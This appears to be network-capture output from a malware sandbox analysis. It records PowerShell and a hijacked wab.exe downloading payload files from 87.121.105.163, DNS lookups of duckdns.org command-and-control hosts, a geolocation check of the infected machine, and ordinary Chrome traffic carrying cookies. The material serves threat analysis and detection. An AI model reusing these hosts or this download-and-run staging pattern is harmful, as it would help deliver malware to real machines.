                                                                                                              May 2, 2024 01:15:04.383187056 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383193016 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383203030 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383219004 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383223057 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383238077 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383254051 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383259058 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383270979 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383286953 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383286953 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383306026 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383322954 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383327007 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383346081 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383362055 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383363008 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383380890 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383397102 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383402109 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383414984 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383436918 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383455992 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383472919 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383493900 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383500099 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383532047 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383538961 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383549929 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383584976 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383631945 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383703947 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383733988 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383738995 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383794069 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383810997 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383831024 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383842945 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383879900 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383884907 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383903027 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383940935 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383981943 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383997917 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384015083 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384031057 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384033918 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384049892 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384069920 CEST497323050192.168.2.545.88.90.110
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 01:14:16.449434996 CEST | 192.168.2.5 | 1.1.1.1 | 0xa97a | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
May 2, 2024 01:14:16.449565887 CEST | 192.168.2.5 | 1.1.1.1 | 0x6e50 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
May 2, 2024 01:14:59.997941971 CEST | 192.168.2.5 | 1.1.1.1 | 0x5765 | Standard query (0) | jgbours284hawara01.duckdns.org | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:02.493674040 CEST | 192.168.2.5 | 1.1.1.1 | 0x7abf | Standard query (0) | jgbours284hawara02.duckdns.org | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:03.106193066 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc96 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:15.996036053 CEST | 192.168.2.5 | 1.1.1.1 | 0x76ce | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 2, 2024 01:16:00.040849924 CEST | 192.168.2.5 | 1.1.1.1 | 0xa879 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 01:14:16.537513971 CEST | 1.1.1.1 | 192.168.2.5 | 0xa97a | No error (0) | www.google.com | | 142.250.80.100 | A (IP address) | IN (0x0001) | false
May 2, 2024 01:14:16.537802935 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e50 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
May 2, 2024 01:15:00.103951931 CEST | 1.1.1.1 | 192.168.2.5 | 0x5765 | No error (0) | jgbours284hawara01.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:02.597037077 CEST | 1.1.1.1 | 192.168.2.5 | 0x7abf | No error (0) | jgbours284hawara02.duckdns.org | | 45.88.90.110 | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:03.196261883 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc96 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 2, 2024 01:15:16.085412025 CEST | 1.1.1.1 | 192.168.2.5 | 0x76ce | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 2, 2024 01:16:00.130646944 CEST | 1.1.1.1 | 192.168.2.5 | 0xa879 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• www.google.com
• slscr.update.microsoft.com
• https:
  • www.bing.com
• 87.121.105.163
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 87.121.105.163 | 80 | 3748 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
May 2, 2024 01:14:05.894881010 CEST | 174 | OUT | GET /Subumbilical.dwp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Connection: Keep-Alive
May 2, 2024 01:14:06.062803030 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 23:14:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 24 Apr 2024 13:33:25 GMT
ETag: "72d2c-616d7b70b1340"
Accept-Ranges: bytes
Content-Length: 470316
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49728 | 87.121.105.163 | 80 | 8024 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
May 2, 2024 01:14:57.639704943 CEST | 187 | OUT | GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Cache-Control: no-cache
May 2, 2024 01:14:57.807414055 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 23:14:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 19 Apr 2024 13:56:34 GMT
ETag: "78c40-6167374a0a880"
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49733 | 178.237.33.50 | 80 | 8024 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
May 2, 2024 01:15:03.365511894 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
May 2, 2024 01:15:03.536905050 CEST | 1173 | IN | HTTP/1.1 200 OK
date: Wed, 01 May 2024 23:15:03 GMT
server: Apache
content-length: 965
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:16 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-05-01 23:14:16 UTC | 1703 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 23:14:16 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-RdgwPbf5oeek1W3z0su80Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
2024-05-01 23:14:16 UTC | 798 | IN
                                                                                                              Data Ascii: 317)]}'["",["national boba tea day","wally gator emotional support alligator","jose abreu houston astros","quordle hints","delta flight emergency slide","astrology monthly horoscope","bethesda starfield update","the pantheon destiny 2 rewards"],["","",
2024-05-01 23:14:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:16 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
2024-05-01 23:14:17 UTC | 1816 | IN | HTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMiZy7EGIjALIRIgueNKZSwbnbeM6qcssEyuGEfzvvuB8Qxn5Ug6CZQq8YZaPjdcAnDu59xiVHYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgwIyZnLsQYQ5qSXiAESBL9gluE
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 427
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=Tf-UhHA6j0Gn40CeTQwHOu4zFeTkJLhfBlPDk5bGGcR4Kb5pzTU0rYWrE39l_xLo7S73wt79LGSXGivdkgpOcPbni9gYVkw4jvp33eBSf5j6rpkq_gaowB5dWImQzM2AJT53SKbhqG7FB2cYv8sWAkLnJzK_pj24yto3TtS-ShM; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
2024-05-01 23:14:17 UTC | 427 | IN
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49713 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:16 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
2024-05-01 23:14:17 UTC | 1843 | IN | HTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgwIyZnLsQYQyoXgigESBL9gluE
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 458
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=PkDRWQ5kdfVS1tPX5bBP3XpnLJW7FpCmVL3o8ho-cuCFJpm5gc5Ec8WlwqMLokSqseFunyNZBsJQL1CpUWIS0QDEudjtKEs8TTI7vBxNtY4jqOMyvVeCgeTT0i3iQzIZO_PamnCvpfhXJTtlmJIPLQESRlfLLZLsQid4TX22s3Q; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
2024-05-01 23:14:17 UTC | 458 | IN
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49715 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:16 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
2024-05-01 23:14:17 UTC | 1760 | IN | HTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgsIyZnLsQYQ1Ju0ahIEv2CW4Q
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 417
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
2024-05-01 23:14:17 UTC | 417 | IN
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:22 UTC | 920 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
2024-05-01 23:14:22 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                              Date: Wed, 01 May 2024 23:14:22 GMT
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Content-Type: text/html
                                                                                                              Server: HTTP server (unknown)
                                                                                                              Content-Length: 3185
                                                                                                              X-XSS-Protection: 0
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
2024-05-01 23:14:22 UTC | 899 | IN
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
2024-05-01 23:14:22 UTC | 1255 | IN
